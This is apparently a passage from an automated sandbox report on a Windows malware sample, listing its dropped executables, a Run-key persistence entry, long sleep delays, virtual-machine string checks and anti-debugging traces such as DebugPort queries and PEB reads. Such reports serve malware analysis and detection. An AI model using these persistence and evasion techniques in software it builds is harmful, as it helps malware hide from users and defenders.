Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037409AD push ecx; mov dword ptr [esp], ecx 12_2_037409B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0371283D push eax; iretd 12_2_03712858
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03711368 push eax; iretd 12_2_03711369
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20270 push edi; iretd 12_2_02D20278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20268 push edi; iretd 12_2_02D20278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D08208 push ds; retf 12_2_02D0820A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D103D1 push E16F236Ah; retn 0031h 12_2_02D103D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D143C0 push edi; retf 12_2_02D143CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1039F push ss; ret 12_2_02D103C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20046 push FFFFFF8Ch; iretd 12_2_02D20077
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D121B0 push esi; retf 12_2_02D121BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D2067E push ecx; ret 12_2_02D206AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1CBAE push eax; retf 12_2_02D1CBB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D14FC8 pushfd ; retf 12_2_02D14FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B681 push ebp; ret 12_2_02D1B68C
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Kanels.exe
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Slavocracy
Source: C:\Users\user\Desktop\16042024124521.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E rdtsc 7_2_22D1096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5967
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3766
Source: C:\Users\user\Desktop\16042024124521.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 2.3 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_02D1B880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: Kanels.exe, 00000007.00000003.2387899164.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2511079073.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Kanels.exe, 00000007.00000003.2387899164.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2511079073.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Users\user\Desktop\16042024124521.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E rdtsc 7_2_22D1096E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B60 NtClose,LdrInitializeThunk, 7_2_22D12B60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA62D6 mov eax, dword ptr fs:[00000030h] 7_2_22DA62D6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02E1 mov eax, dword ptr fs:[00000030h] 7_2_22CE02E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E284 mov eax, dword ptr fs:[00000030h] 7_2_22D0E284
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50283 mov eax, dword ptr fs:[00000030h] 7_2_22D50283
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE02A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov ecx, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA625D mov eax, dword ptr fs:[00000030h] 7_2_22DA625D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A250 mov eax, dword ptr fs:[00000030h] 7_2_22D8A250
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6259 mov eax, dword ptr fs:[00000030h] 7_2_22CD6259
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D58243 mov eax, dword ptr fs:[00000030h] 7_2_22D58243
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D58243 mov ecx, dword ptr fs:[00000030h] 7_2_22D58243
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA250 mov eax, dword ptr fs:[00000030h] 7_2_22CCA250
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC826B mov eax, dword ptr fs:[00000030h] 7_2_22CC826B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4260 mov eax, dword ptr fs:[00000030h] 7_2_22CD4260
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC823B mov eax, dword ptr fs:[00000030h] 7_2_22CC823B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D743D4 mov eax, dword ptr fs:[00000030h] 7_2_22D743D4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov eax, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov ecx, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD83C0 mov eax, dword ptr fs:[00000030h] 7_2_22CD83C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8C3CD mov eax, dword ptr fs:[00000030h] 7_2_22D8C3CD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D563C0 mov eax, dword ptr fs:[00000030h] 7_2_22D563C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D063FF mov eax, dword ptr fs:[00000030h] 7_2_22D063FF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE3F0 mov eax, dword ptr fs:[00000030h] 7_2_22CEE3F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF438F mov eax, dword ptr fs:[00000030h] 7_2_22CF438F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE388 mov eax, dword ptr fs:[00000030h] 7_2_22CCE388
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8397 mov eax, dword ptr fs:[00000030h] 7_2_22CC8397
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D78350 mov ecx, dword ptr fs:[00000030h] 7_2_22D78350
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov ecx, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A352 mov eax, dword ptr fs:[00000030h] 7_2_22D9A352
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA634F mov eax, dword ptr fs:[00000030h] 7_2_22DA634F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7437C mov eax, dword ptr fs:[00000030h] 7_2_22D7437C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A30B mov eax, dword ptr fs:[00000030h] 7_2_22D0A30B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC310 mov ecx, dword ptr fs:[00000030h] 7_2_22CCC310
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0310 mov ecx, dword ptr fs:[00000030h] 7_2_22CF0310
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov eax, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov ecx, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D520DE mov eax, dword ptr fs:[00000030h] 7_2_22D520DE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D120F0 mov ecx, dword ptr fs:[00000030h] 7_2_22D120F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD80E9 mov eax, dword ptr fs:[00000030h] 7_2_22CD80E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA0E3 mov ecx, dword ptr fs:[00000030h] 7_2_22CCA0E3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D560E0 mov eax, dword ptr fs:[00000030h] 7_2_22D560E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC0F0 mov eax, dword ptr fs:[00000030h] 7_2_22CCC0F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD208A mov eax, dword ptr fs:[00000030h] 7_2_22CD208A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D960B8 mov eax, dword ptr fs:[00000030h] 7_2_22D960B8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D960B8 mov ecx, dword ptr fs:[00000030h] 7_2_22D960B8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC80A0 mov eax, dword ptr fs:[00000030h] 7_2_22CC80A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D680A8 mov eax, dword ptr fs:[00000030h] 7_2_22D680A8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56050 mov eax, dword ptr fs:[00000030h] 7_2_22D56050
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2050 mov eax, dword ptr fs:[00000030h] 7_2_22CD2050
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFC073 mov eax, dword ptr fs:[00000030h] 7_2_22CFC073
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D54000 mov ecx, dword ptr fs:[00000030h] 7_2_22D54000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE016 mov eax, dword ptr fs:[00000030h] 7_2_22CEE016
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66030 mov eax, dword ptr fs:[00000030h] 7_2_22D66030
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA020 mov eax, dword ptr fs:[00000030h] 7_2_22CCA020
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC020 mov eax, dword ptr fs:[00000030h] 7_2_22CCC020
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D961C3 mov eax, dword ptr fs:[00000030h] 7_2_22D961C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D001F8 mov eax, dword ptr fs:[00000030h] 7_2_22D001F8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA61E5 mov eax, dword ptr fs:[00000030h] 7_2_22DA61E5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5019F mov eax, dword ptr fs:[00000030h] 7_2_22D5019F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8C188 mov eax, dword ptr fs:[00000030h] 7_2_22D8C188
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D10185 mov eax, dword ptr fs:[00000030h] 7_2_22D10185
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74180 mov eax, dword ptr fs:[00000030h] 7_2_22D74180
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA197 mov eax, dword ptr fs:[00000030h] 7_2_22CCA197
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D68158 mov eax, dword ptr fs:[00000030h] 7_2_22D68158
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov eax, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov ecx, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6154 mov eax, dword ptr fs:[00000030h] 7_2_22CD6154
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC156 mov eax, dword ptr fs:[00000030h] 7_2_22CCC156
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4164 mov eax, dword ptr fs:[00000030h] 7_2_22DA4164
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D90115 mov eax, dword ptr fs:[00000030h] 7_2_22D90115
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov ecx, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov eax, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov ecx, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00124 mov eax, dword ptr fs:[00000030h] 7_2_22D00124
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_22D0A6C7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A6C7 mov eax, dword ptr fs:[00000030h] 7_2_22D0A6C7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D506F1 mov eax, dword ptr fs:[00000030h] 7_2_22D506F1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_22D4E6F2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4690 mov eax, dword ptr fs:[00000030h] 7_2_22CD4690
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D066B0 mov eax, dword ptr fs:[00000030h] 7_2_22D066B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C6A6 mov eax, dword ptr fs:[00000030h] 7_2_22D0C6A6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEC640 mov eax, dword ptr fs:[00000030h] 7_2_22CEC640
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D02674 mov eax, dword ptr fs:[00000030h] 7_2_22D02674
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A660 mov eax, dword ptr fs:[00000030h] 7_2_22D0A660
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9866E mov eax, dword ptr fs:[00000030h] 7_2_22D9866E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12619 mov eax, dword ptr fs:[00000030h] 7_2_22D12619
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E609 mov eax, dword ptr fs:[00000030h] 7_2_22D4E609
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD262C mov eax, dword ptr fs:[00000030h] 7_2_22CD262C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE627 mov eax, dword ptr fs:[00000030h] 7_2_22CEE627
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D06620 mov eax, dword ptr fs:[00000030h] 7_2_22D06620
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08620 mov eax, dword ptr fs:[00000030h] 7_2_22D08620
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDC7C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDC7C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D507C3 mov eax, dword ptr fs:[00000030h] 7_2_22D507C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF27ED mov eax, dword ptr fs:[00000030h] 7_2_22CF27ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E7E1 mov eax, dword ptr fs:[00000030h] 7_2_22D5E7E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD47FB mov eax, dword ptr fs:[00000030h] 7_2_22CD47FB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7678E mov eax, dword ptr fs:[00000030h] 7_2_22D7678E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD07AF mov eax, dword ptr fs:[00000030h] 7_2_22CD07AF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D847A0 mov eax, dword ptr fs:[00000030h] 7_2_22D847A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D54755 mov eax, dword ptr fs:[00000030h] 7_2_22D54755
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12750 mov eax, dword ptr fs:[00000030h] 7_2_22D12750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E75D mov eax, dword ptr fs:[00000030h] 7_2_22D5E75D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0750 mov eax, dword ptr fs:[00000030h] 7_2_22CD0750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0674D mov esi, dword ptr fs:[00000030h] 7_2_22D0674D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0674D mov eax, dword ptr fs:[00000030h] 7_2_22D0674D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8770 mov eax, dword ptr fs:[00000030h] 7_2_22CD8770
